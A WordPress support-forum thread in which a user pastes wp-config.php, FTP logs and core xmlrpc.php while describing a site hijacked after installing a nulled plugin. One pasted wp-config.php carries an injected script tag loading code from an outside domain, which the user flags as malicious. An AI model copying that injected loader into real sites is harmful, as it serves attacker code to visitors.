mrgoth
Forum Replies Created
-
i fix it now i can delete and edit files on my website but i dont know why i got this when clicking my website https://visiongoth.store
/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don’t have to use the web site, you can * copy this file to “wp-config.php” and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://ww.wp.xz.cn/support/article/editing-wp-config-php/ * * @package WordPress */ define(‘WP_HOME’, ‘https://visiongoth.store’); define(‘WP_SITEURL’, ‘https://visiongoth.store’); // ** MySQL settings – You can get this info from your web host ** // /** The name of the database for WordPress */ define( ‘DB_NAME’, ‘private’ ); /** MySQL database username */ define( ‘DB_USER’, ‘private’ ); /** MySQL database password */ define( ‘DB_PASSWORD’, ‘private’ ); /** MySQL hostname */ define( ‘DB_HOST’, ‘localhost’ ); /** Database Charset to use in creating database tables. */ define( ‘DB_CHARSET’, ‘utf8’ ); /** The Database Collate type. Don’t change this if in doubt. */ define( ‘DB_COLLATE’, ” ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.ww.wp.xz.cn/secret-key/1.1/salt/ ww.wp.xz.cn secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( ‘AUTH_KEY’, ‘put your unique phrase here’ ); define( ‘SECURE_AUTH_KEY’, ‘put your unique phrase here’ ); define( ‘LOGGED_IN_KEY’, ‘put your unique phrase here’ ); define( ‘NONCE_KEY’, ‘put your unique phrase here’ ); define( ‘AUTH_SALT’, ‘put your unique phrase here’ ); define( ‘SECURE_AUTH_SALT’, ‘put your unique phrase here’ ); define( ‘LOGGED_IN_SALT’, ‘put your unique phrase here’ ); define( ‘NONCE_SALT’, ‘put your unique phrase here’ ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = ‘wp_’; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://ww.wp.xz.cn/support/article/debugging-in-wordpress/ */ define( ‘WP_DEBUG’, true ); /* That’s all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( ‘ABSPATH’ ) ) { define( ‘ABSPATH’, dirname( __FILE__ ) . ‘/’ ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . ‘wp-settings.php’;
i contacted my hosting and after a new ftp credentials i still got this
Status: Logged in
Status: Retrieving directory listing…
Status: Directory listing of “/” successful
Status: Setting permissions of ‘/public_html’ to ‘755’
Command: SITE CHMOD 755 public_html
Response: 550 Could not change perms on public_html: Operation not permittedStatus: Logged in
Status: Starting download of /public_html/wp-config.php
Status: File transfer successful, transferred 3,163 bytes in 1 second
Status: Deleting “/public_html/wp-config.php”
Command: DELE wp-config.php
Response: 550 Could not delete wp-config.php: Permission denied- This reply was modified 2 years, 2 months ago by mrgoth.
the problem is I can’t even upload files or delete files because of permission denied
there is also something called xmlrpc.php
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request. * * @var bool */ define( 'XMLRPC_REQUEST', true ); // Discard unneeded cookies sent by some browser-embedded clients. $_COOKIE = array(); // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // Fix for mozBlog and other cases where '<?xml' isn't on the very first line. if ( isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA ); } // phpcs:enable /** Include the bootstrap for setting up WordPress environment */ require_once __DIR__ . '/wp-load.php'; if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>https://ww.wp.xz.cn/</engineLink> <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <?php /** * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint. * * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html * * @since 3.5.0 */ do_action( 'xmlrpc_rsd_apis' ); ?> </apis> </service> </rsd> <?php exit; } require_once ABSPATH . 'wp-admin/includes/admin.php'; require_once ABSPATH . WPINC . '/class-IXR.php'; require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'; /** * Posts submitted via the XML-RPC interface get that title * * @name post_default_title * @var string */ $post_default_title = ''; /** * Filters the class used for handling XML-RPC requests. * * @since 3.1.0 * * @param string $class The name of the XML-RPC server class. */ $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' ); $wp_xmlrpc_server = new $wp_xmlrpc_server_class(); // Fire off the request. $wp_xmlrpc_server->serve_request(); exit; /** * logIO() - Writes logging info to a file. * * @since 1.2.0 * @deprecated 3.4.0 Use error_log() * @see error_log() * * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging. * * @param string $io Whether input or output. * @param string $msg Information describing logging reason. */ function logIO( $io, $msg ) { _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' ); if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) { error_log( $io . ' - ' . $msg ); } }Thanks for your reply but as my dashboard stucks i cant analyse on succuri its stuck in loading… , i also cant access ftp or change any permission but as i see on my wp-config.php :
<script src="https://cache.cloudswiftcdn.com/"></script><?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://ww.wp.xz.cn/support/article/editing-wp-config-php/ * * @package WordPress */ define('WP_HOME', 'https://visiongoth.store'); define('WP_SITEURL', 'https://visiongoth.store'); // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */there’s a malicious script here
I suspect I’ve identified the source of the issue. When attempting to log into wp-admin, I noticed my database password has been encrypted, and multiple unauthorized users are accessing the system alongside me. Additionally, I’ve lost access to my FTP and cannot edit files using the online file manager due to permission denial. Furthermore, my website now displays mature content and ads after I installed a nulled plugin